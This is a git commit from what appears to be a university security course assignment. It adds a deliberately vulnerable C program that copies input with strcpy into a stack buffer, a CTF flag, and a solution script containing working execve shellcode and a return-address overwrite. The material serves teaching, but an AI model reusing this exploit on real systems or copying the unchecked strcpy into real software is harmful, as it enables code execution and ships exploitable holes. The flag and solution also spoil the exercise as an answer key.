[Assignment-6] renamed assignment directory

2024-06-14 15:49:15 +02:00 · 2024-06-14 15:49:15 +02:00 · 986a511078
commit 986a511078
parent b040e57d50
6 changed files with 39 additions and 0 deletions
--- a/2/abgabe.tex
+++ b/2/abgabe.tex
--- a/2/basic_overflow/Bildschirmfoto
+++ b/2/basic_overflow/Bildschirmfoto
--- a/2/basic_overflow/basic_overflow
+++ b/2/basic_overflow/basic_overflow
--- a/2/basic_overflow/basic_overflow.c
+++ b/2/basic_overflow/basic_overflow.c
@ -0,0 +1,24 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+// vulnerable function
+int overflow_me(char* input)
+{
+    char buff[100];
+    printf("Buffer is at %p\n", &buff); // buff's address is leaked :O
+    strcpy(buff, input);
+
+    return 1;
+}
+
+int main(int argc, char *argv[])
+{
+    if(argc < 2)
+    {
+        printf("Syntax: %s <input string>\n", argv[0]);
+        exit (0);
+    }
+    overflow_me(argv[1]);
+    return 0;
+}
--- a/2/basic_overflow/flag
+++ b/2/basic_overflow/flag
@ -0,0 +1 @@
+flag{THAT_WAS_EASY_HUH}
--- a/2/basic_overflow/solution.sh
+++ b/2/basic_overflow/solution.sh
@ -0,0 +1,14 @@
+#!/bin/bash
+
+# flag{THAT_WAS_EASY_HUH}
+
+######### Exploit #########
+# Step 1: Write the provided shellcode to stdout
+printf "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"
+
+# Step 2: Fill the buffer with 'A's until the stored EIP is reached
+printf "A%.0s" {1..91}
+
+# Step 3: Overwrite the stored EIP with the address of the shellcode
+printf "\x2c\xd5\xff\xff"
+###########################